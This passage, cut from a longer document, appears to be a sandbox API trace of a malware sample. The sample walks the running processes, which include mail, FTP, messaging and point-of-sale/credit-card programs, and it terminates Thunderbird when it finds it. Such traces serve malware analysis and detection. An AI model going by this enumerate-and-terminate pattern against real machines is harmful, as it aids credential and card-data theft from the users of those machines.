lpMultiByteStr=0x357db48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0099.996] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0099.996] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="thunderbird") returned 0x0 [0099.996] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0099.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0099.997] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574fc0 [0099.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574fc0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0099.997] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0099.997] StrStrIA (lpFirst="icq.exe", lpSrch="thunderbird") returned 0x0 [0099.997] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0099.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.998] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c978 [0099.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x357c978, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.998] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0099.998] StrStrIA (lpFirst="leechftp.exe", lpSrch="thunderbird") returned 0x0 [0099.999] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0100.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.000] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c9a8 [0100.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x357c9a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.000] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0100.000] StrStrIA (lpFirst="ncftp.exe", lpSrch="thunderbird") returned 0x0 [0100.000] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0100.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.001] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357caf8 [0100.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x357caf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0100.001] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0100.001] StrStrIA (lpFirst="notepad.exe", lpSrch="thunderbird") returned 0x0 [0100.001] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0100.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.003] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357ca38 [0100.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x357ca38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0100.003] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0100.003] StrStrIA (lpFirst="operamail.exe", lpSrch="thunderbird") returned 0x0 [0100.003] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0100.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.004] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357cb70 [0100.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x357cb70, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0100.004] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0100.005] StrStrIA (lpFirst="pidgin.exe", lpSrch="thunderbird") returned 0x0 [0100.005] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0100.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.006] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357cb88 [0100.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x357cb88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0100.006] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0100.006] StrStrIA (lpFirst="scriptftp.exe", lpSrch="thunderbird") returned 0x0 [0100.006] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0100.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.007] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357ca50 [0100.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x357ca50, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0100.007] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0100.007] StrStrIA (lpFirst="skype.exe", lpSrch="thunderbird") returned 0x0 [0100.007] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0100.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.009] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c990 [0100.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x357c990, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.009] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0100.009] StrStrIA (lpFirst="smartftp.exe", lpSrch="thunderbird") returned 0x0 [0100.009] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0100.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.010] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357ca68 [0100.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x357ca68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0100.010] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0100.010] StrStrIA (lpFirst="thunderbird.exe", lpSrch="thunderbird") returned="thunderbird.exe" [0100.010] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xf40) returned 0x354 [0100.010] TerminateProcess (hProcess=0x354, uExitCode=0x29a) returned 1 [0100.022] CloseHandle (hObject=0x354) returned 1 [0100.022] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0100.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.023] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357ca80 [0100.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x357ca80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0100.023] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0100.023] StrStrIA (lpFirst="totalcmd.exe", lpSrch="thunderbird") returned 0x0 [0100.023] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0100.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.024] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357cba0 [0100.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x357cba0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0100.024] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0100.025] StrStrIA (lpFirst="trillian.exe", lpSrch="thunderbird") returned 0x0 [0100.025] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0100.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.026] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c8e8 [0100.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x357c8e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0100.026] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0100.026] StrStrIA (lpFirst="webdrive.exe", lpSrch="thunderbird") returned 0x0 [0100.026] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0100.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.027] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c9c0 [0100.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x357c9c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.027] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0100.027] StrStrIA (lpFirst="whatsapp.exe", lpSrch="thunderbird") returned 0x0 [0100.027] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0100.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.028] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c8b8 [0100.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x357c8b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0100.029] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0100.029] StrStrIA (lpFirst="winscp.exe", lpSrch="thunderbird") returned 0x0 [0100.029] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0100.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.030] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357db68 [0100.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357db68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0100.030] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0100.030] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="thunderbird") returned 0x0 [0100.030] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0100.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.031] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357dba8 [0100.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357dba8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0100.031] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0100.031] StrStrIA (lpFirst="active-charge.exe", lpSrch="thunderbird") returned 0x0 [0100.031] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0100.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.033] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cac8 [0100.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x357cac8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0100.033] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0100.033] StrStrIA (lpFirst="accupos.exe", lpSrch="thunderbird") returned 0x0 [0100.033] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0100.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.034] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c8d0 [0100.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x357c8d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0100.034] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0100.034] StrStrIA (lpFirst="afr38.exe", lpSrch="thunderbird") returned 0x0 [0100.035] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0100.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.036] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357ca98 [0100.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x357ca98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0100.036] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0100.036] StrStrIA (lpFirst="aldelo.exe", lpSrch="thunderbird") returned 0x0 [0100.036] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0100.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.037] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x357c930 [0100.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x357c930, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0100.037] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0100.037] StrStrIA (lpFirst="ccv_server.exe", lpSrch="thunderbird") returned 0x0 [0100.037] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0100.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.038] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357dea8 [0100.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357dea8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0100.039] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0100.039] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="thunderbird") returned 0x0 [0100.039] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0100.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 